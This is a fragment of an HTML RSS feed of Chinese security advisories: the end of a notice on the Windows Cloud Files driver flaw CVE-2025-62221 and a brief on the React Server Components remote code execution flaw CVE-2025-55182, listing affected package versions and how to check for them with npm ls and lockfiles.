class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="color: rgb(0, 82, 255);font-size: 14px;background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-62221" target="_blank">https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-62221</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">微软官方发布12月例行安全更新公告，共涉及57个漏洞的安全更新发布，其中披露了其 Windows Cloud Files Mini Filter Driver 存在本地权限提升漏洞，漏洞编号CVE-2025-62221。Windows Cloud Files Mini Filter Driver 主要用于管理和促进云存储文件的操作。它允许 Windows 与云存储服务同步，使用户能够直接从本地系统访问、修改和管理其云存储文件。这使得用户可以更轻松地处理存储在云端的文件，而无需频繁地下载和上传文件。 据官方描述， 在 Windows Cloud Files Minifilter 驱动程序 (cldflt.sys) 中存在 Use After Free 漏洞，经过身份验证的本地攻击者可利用该漏洞提升权限至 SYSTEM 权限。 目前该漏洞已存在在野利用。</span></p></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247510990">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=c67898e4&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247510990%26idx%3D1%26sn%3Df73ecff90fdd80239e2f93e6fe0f5ac8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 15 Dec 2025 16:30:00 +0800</pubDate>
    </item>
    <item>
      <title>React 远程代码执行漏洞简报</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247510986&amp;idx=1&amp;sn=424be0708a67b3ef8a802ca6bb5e4fdb</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>科恩DF小队</span> <span>2025-12-09 10:45</span> <span style="display: inline-block;">北京</span></p>




  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=0eff94ee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6AoQM3RKCWWRkibE9RF6EYudF0rMZpxOQ1dwA0PiaA3mYaQszVefdVEL115AIDR3AVS87efeia86Fk56jJIQiaECMA%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div data-mpa-template="t" mpa-from-tpl="t" data-mpa-action-id="malurube3fq" data-pm-slice="0 0 []"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mf53qk7t1bas" data-pm-slice="4 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/OxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ/640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">01</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf="" mpa-font-style="mf5250p18ao" style="font-size: 18px;" data-mpa-action-id="mf5250pb14bq" data-pm-slice="0 0 []">漏洞基本信息</span></p></div></div></div></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;font-size:16px;"><p><span data-font-family="default" mpa-font-style="mf51zshsqqe" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf520ieh1a09" data-mpa-action-id="mf520ieu1fob" data-pm-slice="0 0 []"><span textstyle="" style="font-size: 16px;font-weight: bold;">漏洞名称</span></span></span></p></li></ul><p style="text-indent: 2em;"><span leaf=""><span textstyle="" style="font-size: 14px;">CVE-2025-55182</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p><span data-font-family="default" mpa-font-style="mf51zshsqqe" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf520ieh1a09" data-mpa-action-id="mf520ieu1fob" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">漏洞发布时间</span></span></span></p></li></ul><p style="text-indent: 2em;"><span data-font-family="default" mpa-font-style="mf51zshs5hh" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2025年12月03日</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p><span data-font-family="default" mpa-font-style="mf51zshs1cqa" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf520s571610" data-mpa-action-id="mf520s5l1m98" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">影响组件</span></span></span></p></li></ul><p style="text-indent: 2em;"><span data-font-family="default" mpa-font-style="mf51zshs1jxh" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">React Server Components</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p><span data-font-family="default" mpa-font-style="mf51zshst6l" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf5210i216b1" data-mpa-action-id="mf5210ig1uw7" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">影响版本</span></span></span></p></li></ul><p style="text-align:left;margin-top:3pt;margin-bottom:3pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">        该漏洞影响以下 React 19 RSC 相关包：</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><ul style="list-style-type:square;" class="list-paddingleft-1"><ul style="list-style-type:circle;" class="list-paddingleft-1"><li><p style="text-align:left;margin-top:3pt;margin-bottom:3pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">react-server-dom-webpack</span></span></span></p></li></ul></ul><ul style="list-style-type:square;" class="list-paddingleft-1"><ul style="list-style-type:circle;" class="list-paddingleft-1"><li><p style="text-align:left;margin-top:3pt;margin-bottom:3pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">react-server-dom-parcel</span></span></span></p></li></ul></ul><ul style="list-style-type:square;" class="list-paddingleft-1"><ul style="list-style-type:circle;" class="list-paddingleft-1"><li><p style="text-align:left;margin-top:3pt;margin-bottom:3pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">react-server-dom-turbopack</span></span></span></p></li></ul></ul></ul><p style="text-align: left;line-height: 1.3;margin: 16px 0pt 3pt;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">        受影响版本为：19.0.0、19.1.0、19.1.1、19.2.0</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;"><p><span data-font-family="default" mpa-font-style="mf51zshs157v" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf521fn61tlk" data-mpa-action-id="mf521fnjt5e" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">披露渠道</span></span></span></p></li></ul><p style="text-indent: 2em;"><span data-font-family="default" mpa-font-style="mf51zshsa4m" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">官方公告</span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 10px;color: rgb(178, 178, 178);font-weight: bold;">[1]</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;font-size:14px;"><p style="text-align: left;"><span data-font-family="default" mpa-font-style="mf51zshs1kgr" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf522abs1gd1" data-mpa-action-id="mf522ac5od9" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">漏洞危害</span></span></span></p></li></ul><p style="text-align: left;text-indent: 2em;"><span data-font-family="default" mpa-font-style="mf51zshsp1i" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">CVE-2025-55182 允许远程未认证攻击者在受影响的 React / Next.js 服务端执行任意代码。</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;font-size:14px;"><p><span data-font-family="default" mpa-font-style="mf51zshs1npu" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf522yaa18dl" data-mpa-action-id="mf522yao24lg" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">漏洞描述</span></span></span></p></li></ul><p style="text-indent: 2em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mf51zshseyy">CVE-2025-55182 是发生在 React Server Components “Flight” 协议实现中的不安全反序列化漏洞。受影响的版本在处理客户端发送到 React Server Function 端点 的 Flight payload 时，没有对结构进行充分校验，导致服务端在反序列化这些数据时会执行攻击者控制的代码。</span></span></p><p style="text-indent: 2em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mf51zshseyy">攻击者只需向暴露在公网的应用发送特制 HTTP 请求，即可在服务器上执行任意代码，目前已出现公开 PoC</span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;mf53qk7t1bas&#34;,&#34;data-pm-slice&#34;:&#34;4 3 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;data-mpa-template\&#34;:\&#34;t\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;,\&#34;data-mpa-action-id\&#34;:\&#34;malurube3fq\&#34;,\&#34;data-pm-slice\&#34;:\&#34;0 0 []\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;section\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;\&#34;,\&#34;data-mid\&#34;:\&#34;\&#34;,\&#34;mpa-from-tpl\&#34;:\&#34;t\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;&#34;,&#34;data-font-family&#34;:&#34;default&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 10px;color: rgb(178, 178, 178);font-weight: bold;">[2]</span></span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mf51zshseyy">和在野利用，风险极高。</span></span></p><div data-mpa-template="t" mpa-from-tpl="t" data-mpa-action-id="malurube3fq" data-pm-slice="0 0 []"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdeb7ech16ky" data-pm-slice="4 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/OxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ/640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">02</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf="" mpa-font-style="mf53uvudfii" style="font-size: 18px;" data-mpa-action-id="mf53uvuqdzw" data-pm-slice="0 0 []">排查方式</span></p></div></div></div></div></div></div></div></div><p style="text-align: left;margin: 16px 0pt 3pt;text-indent: 2em;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(51, 51, 51);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="">可以用npm ls查看react-server-dom-webpack、react-server-dom-parcel、react-server-dom-turbopack版本是否在影响范围内。</span></span></p><p style="text-align: left;margin: 16px 0pt 3pt;text-indent: 2em;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(51, 51, 51);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="">另外可以看 lockfile（package-lock.json / yarn.lock / pnpm-lock.yaml），因为 RSC 包也可能是间接引入的。</span></span></p><div data-mpa-template="t" mpa-from-tpl="t" data-mpa-action-id="malurube3fq" data-pm-slice="0 0 []"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdeb7ech16ky" data-pm-slice="4 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: 